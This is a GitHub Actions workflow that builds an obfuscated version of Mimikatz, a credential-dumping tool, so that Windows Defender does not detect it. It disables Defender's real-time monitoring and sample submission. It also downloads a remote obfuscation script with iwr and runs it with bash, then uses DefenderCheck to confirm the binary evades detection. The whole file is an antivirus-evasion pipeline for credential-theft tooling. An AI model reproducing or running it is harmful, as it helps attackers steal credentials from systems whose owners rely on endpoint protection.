name: Invoke-Mimikatz Randomizer

on:
  workflow_dispatch

jobs:
  build:
    name: Build Invoke-Mimikatz
    runs-on: windows-latest
    steps:    

    - name: Checkout
      uses: actions/checkout@v2

    - name: Add msbuild to PATH
      uses: microsoft/setup-msbuild@v1.0.0
      with:
        vs-version: 14.0

    - name: Install dependencies
      run: |
        choco install --force --force-dependencies visualcpp-build-tools windows-sdk-8.1
        choco install --force --force-dependencies microsoft-build-tools --version=12.0.21005.20140416
        git clone https://github.com/matterpreter/DefenderCheck.git "$env:GITHUB_WORKSPACE\DefenderCheck"

    - name: Configure Windows Defender
      run: |
        Set-MpPreference -DisableRealtimeMonitoring $true
        Set-MpPreference -MAPSReporting 0
        Set-MpPreference -SubmitSamplesConsent 2

    - name: Build DefenderCheck
      run: |
        cd "$env:GITHUB_WORKSPACE\DefenderCheck\DefenderCheck"
        msbuild DefenderCheck.sln /t:Build
        
    - name: Get obfuscation script
      run: |
        mkdir -p "$env:GITHUB_WORKSPACE\working"
        cd "$env:GITHUB_WORKSPACE\working"
        iwr -uri https://gist.githubusercontent.com/S3cur3Th1sSh1t/08623de0c5cc67d36d4a235cec0f5333/raw/dafbd32d1307c4ebb512e4eb7c43c7e1292bcac9/ObfuscateMimi_First.sh -outfile "$env:GITHUB_WORKSPACE\working\run.sh"
        
    - name: Run obfuscation script
      shell: bash
      run: |
        cd "$GITHUB_WORKSPACE\working"
        bash run.sh
        
    - name: Check current with Defender
      run: |
        ls "$env:GITHUB_WORKSPACE\DefenderCheck\DefenderCheck\DefenderCheck\obj\Debug\DefenderCheck.exe"
        ls "$env:GITHUB_WORKSPACE\working\windows\"
        ls "$env:GITHUB_WORKSPACE\working\windows\Win32\"
        & "$env:GITHUB_WORKSPACE\DefenderCheck\DefenderCheck\DefenderCheck\obj\Debug\DefenderCheck.exe" "$env:GITHUB_WORKSPACE\working\windows\Win32\mimikatz.exe"
